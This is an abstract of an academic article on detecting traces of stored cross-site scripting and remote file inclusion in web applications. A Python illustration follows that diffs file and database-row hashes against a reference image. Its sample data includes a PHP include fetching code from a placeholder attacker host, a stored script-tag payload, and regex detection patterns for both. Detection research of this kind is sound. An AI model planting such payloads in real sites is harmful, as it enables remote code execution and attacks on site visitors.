Shipulin Georgy Farizovich (PhD in Law, Associate Professor, RTU MIREA; Associate Professor, Moscow Polytechnic University)
The article addresses the identification of traces of exploitation of web-application vulnerabilities of the Injections class under the updated 2025 OWASP Top 10 classification, using stored cross-site scripting and remote file inclusion as examples. The proposed approach to detecting post-exploitation traces (traces of vulnerability exploitation) is based on comparing the current state of a web application with an image of its reference state and then analyzing changes in the web application's data (files and rows of target database tables). It comprises five procedures: forming an image of the reference state; determining changes in the current state; analyzing and evaluating changes in the current state; updating the data on changes to the current and previous states; and updating the image of the reference state of the system. To test the proposed approach against traces of exploitation of stored cross-site scripting and remote file inclusion vulnerabilities, a software tool was developed and tested, confirming the approach's applicability. The approach's applicability is limited by the peculiarities of exploiting certain Injections-class vulnerabilities, as a result of which no changes are made to the structure and content of the attacked web application.
Keywords: vulnerabilities, web applications, stored cross-site scripting, detection of post-exploitation of web vulnerabilities, traces of exploitation of web vulnerabilities, OWASP, information security.
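The five procedures described in the abstract can be illustrated with a small reference-image comparison. The following is an added example written for this page; it is not the author's software tool and makes no claim about how that tool is implemented. It assumes the monitored objects are a set of web-root files (held here as an in-memory path-to-bytes mapping, constructed for the demo) and the rows of one target database table (an in-memory SQLite table named `comments`, also constructed), and it uses two deliberately coarse indicator patterns (script markup for stored XSS, an include of a remote or stream-wrapper URL for RFI) to evaluate only the objects that changed since the reference image was taken.

```python
from __future__ import annotations

import hashlib
import re
import sqlite3
from dataclasses import dataclass, field

# --- Constructed sample data (not from the article) --------------------------
# Web application files as path -> bytes, at reference time and at check time.
FILES_REFERENCE = {
    "index.php": b"<?php include 'header.php'; ?>",
    "header.php": b"<h1>Demo shop</h1>",
}
FILES_CURRENT = {
    "index.php": b"<?php include 'header.php'; ?>",
    "header.php": b"<h1>Demo shop</h1>",
    # New file that includes a remote URL: the kind of trace RFI exploitation
    # leaves in the web root (constructed sample, placeholder host).
    "uploads/avatar.php": b"<?php include('http://evil.example.invalid/x.txt'); ?>",
}
# Rows of the target table: (id, author, body).
ROWS_REFERENCE = [(1, "alice", "Great product!")]
ROWS_CURRENT = [
    (1, "alice", "Great product!"),
    # Script markup persisted in a user-controlled column: a stored XSS trace.
    (2, "mallory", "<script>alert(1)</script>"),
]

# Coarse indicators, applied only to objects that changed since the reference.
INDICATORS = {
    "stored_xss": re.compile(rb"<\s*script\b|\bon[a-z]+\s*=|javascript:", re.I),
    "remote_file_inclusion": re.compile(
        rb"\b(include|require)(_once)?\s*\(?\s*['\"]?(https?|ftp|php|data):", re.I),
}


def make_db(rows):
    """Build the constructed target table in an in-memory SQLite database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE comments (id INTEGER PRIMARY KEY, author TEXT, body TEXT)")
    conn.executemany("INSERT INTO comments VALUES (?, ?, ?)", rows)
    return conn


def snapshot(files, conn, table="comments", key="id"):
    """Collect every monitored object as ident -> bytes (files and table rows)."""
    objects = {f"file:{path}": data for path, data in files.items()}
    cur = conn.execute(f"SELECT * FROM {table}")  # table name comes from config, never from users
    cols = [d[0] for d in cur.description]
    for row in cur.fetchall():
        rec = dict(zip(cols, row))
        serialized = "\x1f".join(f"{c}={rec[c]}" for c in cols).encode()
        objects[f"{table}:{rec[key]}"] = serialized
    return objects


def image(objects):
    """Procedure 1: the reference image keeps only a hash per object, not content."""
    return {ident: hashlib.sha256(data).hexdigest() for ident, data in objects.items()}


@dataclass
class Change:
    ident: str
    kind: str  # "added", "modified" or "deleted"
    findings: list[str] = field(default_factory=list)


def diff(reference, current_image):
    """Procedure 2: determine which objects changed relative to the reference image."""
    changes = []
    for ident in sorted(set(reference) | set(current_image)):
        if ident not in reference:
            changes.append(Change(ident, "added"))
        elif ident not in current_image:
            changes.append(Change(ident, "deleted"))
        elif reference[ident] != current_image[ident]:
            changes.append(Change(ident, "modified"))
    return changes


def analyze(changes, objects):
    """Procedure 3: evaluate the content of added/modified objects against indicators."""
    for ch in changes:
        if ch.kind == "deleted":
            continue  # nothing left to inspect; the deletion itself is already recorded
        data = objects[ch.ident]
        ch.findings = [name for name, rx in INDICATORS.items() if rx.search(data)]
    return changes


def cycle(reference, objects, change_log):
    """One detection cycle: procedures 2-5. Returns (changes, new reference image)."""
    current = image(objects)
    changes = analyze(diff(reference, current), objects)  # procedures 2 and 3
    change_log.extend(changes)                            # procedure 4: history of changes
    return changes, current                               # procedure 5: current image becomes the reference


if __name__ == "__main__":
    reference = image(snapshot(FILES_REFERENCE, make_db(ROWS_REFERENCE)))
    log = []
    changes, reference = cycle(reference, snapshot(FILES_CURRENT, make_db(ROWS_CURRENT)), log)
    for ch in changes:
        print(ch.kind, ch.ident, ch.findings or "no indicators")
```

Storing hashes rather than content in the reference image keeps the image small and avoids holding a second copy of user data; the content is only read for objects the diff flags. Because the new reference is the image just checked, a trace that is accepted once will not be reported again, which is why procedure 4 (the change log) has to be retained independently of the reference image.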
Citation: Shipulin G. F. An approach to detecting traces of exploiting vulnerabilities in web applications of the Injections class using the example of vulnerabilities in stored cross-site scripting and remote file inclusion // Современная наука: актуальные проблемы теории и практики. Серия: Естественные и Технические Науки. 2026. No. 02/2, pp. 139-142. DOI 10.37882/2223-2966.2026.02-2.32